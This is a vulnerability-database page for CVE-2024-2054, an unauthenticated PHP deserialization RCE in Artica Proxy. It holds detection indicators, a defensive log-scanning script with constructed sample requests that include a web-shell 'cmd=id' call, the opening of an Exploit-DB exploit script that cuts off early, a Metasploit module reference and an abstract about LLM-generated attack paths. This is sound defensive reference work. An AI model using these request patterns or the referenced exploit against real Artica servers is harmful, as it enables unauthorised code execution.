CVE-2024-2054
Published 2024-03-21
CVE-2024-2054: The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution…
Priority: P1 · 85 · critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 81.26% (99.6th percentile)
The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica_tech | artica_proxy | — | — |
| articatech | artica_proxy | — | — |
Detection & IOCs (extracted from sources)
- Detect unauthenticated GET requests to /wizard/wiz.wizard.progress.php containing the 'build-js' query parameter with a serialized PHP object payload — this is the deserialization trigger.
- Detect GET requests to /wizard/wiz.upload.php with a 'cmd' query parameter — this indicates webshell-style command execution following successful deserialization exploitation.
- Monitor for processes spawned as the 'www-data' user executing unexpected OS commands, which is the post-exploitation execution context for this CVE.
- The exploit was successfully weaponized via Metasploit (module: exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054); monitor for Metasploit reverse shell indicators on hosts running Artica Proxy 4.40/4.50.
- The exploit targets Artica Proxy versions 4.40 and 4.50 specifically; other versions may not be affected.
- The administrative web interface port (default 9000) may vary depending on deployment configuration, which could affect network-layer detection rules.
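
The two request-level checks from the list above, applied to web access logs, as an added example that is not part of the original page or of any vendor tooling. It assumes combined-format log lines and that the 'build-js' value may arrive base64-encoded as well as raw (an assumption; the page only says it carries a serialized PHP object); the function names, log lines, IP addresses and the harmless stdClass object are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Serialized PHP object header: O:<name length>:"<class>":<property count>:{
PHP_OBJECT_RE = re.compile(rb'O:\d+:"[^"]+":\d+:\{')

def looks_like_php_object(value):
    """True if value, raw or base64-encoded, holds a serialized PHP object."""
    candidates = [value.encode()]
    b64 = value.replace(" ", "+")  # parse_qs turns a literal '+' into a space
    try:  # Assumption: the value may be base64-encoded
        candidates.append(base64.b64decode(b64 + "=" * (-len(b64) % 4)))
    except (binascii.Error, ValueError):
        pass  # not base64; only the raw form is checked
    return any(PHP_OBJECT_RE.search(c) for c in candidates)

def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m or m["method"] != "GET":
        return None
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)
    path = url.path.lower()
    if path.endswith("/wizard/wiz.wizard.progress.php") and "build-js" in params:
        if any(looks_like_php_object(v) for v in params["build-js"]):
            return "deserialization-trigger"
        return "build-js-other"  # parameter present, no recognisable object
    if path.endswith("/wizard/wiz.upload.php") and "cmd" in params:
        return "cmd-parameter"
    return None

def scan(lines):
    """Return (line number, label) for every line that produced a finding."""
    return [(n, label) for n, line in enumerate(lines, 1)
            if (label := classify(line))]

# Constructed sample data: a harmless stdClass object and documentation IPs.
SAMPLE_OBJECT = base64.b64encode(b'O:8:"stdClass":1:{s:1:"a";s:1:"b";}').decode()
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:00:00:01 +0000] "GET /wizard/wiz.wizard.progress.php'
    f'?build-js={quote(SAMPLE_OBJECT)} HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2025:00:00:02 +0000] "GET /wizard/wiz.upload.php?cmd=id HTTP/1.1" 200 64',
    '198.51.100.4 - - [01/Jan/2025:00:00:03 +0000] "GET /wizard/wiz.wizard.progress.php?build-js=1 HTTP/1.1" 200 90',
    '198.51.100.4 - - [01/Jan/2025:00:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024',
]
```

Matching on the path rather than the port keeps the check valid when the administrative interface is not on the default 9000.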
No detection rules found.
Exploit-DB
Artica Proxy 4.50 - Remote Code Execution (RCE)
exploitdb·2025-04-09·CVSS 9.8
---
```python
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
# you can also find the exploit on my github repo:
# https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore

print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1]=="/":
    ACTUAL_URL = URL[:-1]
else:
    ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL

def check(ARTICA_URL):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        check = requests.g
```
Metasploit
Artica Proxy Unauthenticated PHP Deserialization Vulnerability
metasploit
A command injection vulnerability in the Artica Proxy appliance, versions 4.50 and 4.40, allows remote attackers to run arbitrary commands via an unauthenticated HTTP request. The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
Greynoiseio
NoiseLetter August 2024
blogs_greynoiseio
arXiv
AEGIS: White-Box Attack Path Generation using LLMs and Training Effectiveness Evaluation for Large-Scale Cyber Defence Exercises
arxiv_fulltext·2026-01-30
Ivan K. Tung (ORCID 0000-0001-9454-1905), Shi Yu Xiang (ORCID 0009-0004-4870-4290), Alex Chien (ORCID 0009-0001-9727-2509), Liu Wenkai (ORCID 0009-0005-1953-7523), Lawrence Zheng (ORCID 0009-0005-9623-3347)
Cyber Defence Test and Evaluation Centre (CyTEC),
The Digital and Intelligence Service (DIS), Singapore Armed Forces
## Abstract
Creating attack paths for cyber defence exercises requires substantial expert effort. Existing automation requires vulnerability graphs or exploit sets curated in advance, limiting where it can be applied. We present AEGIS, a system that generates attack paths using LLMs, white-box access, and Monte Carlo Tree Search over real exploit execution. LLM-based searc
Published: 2024-03-21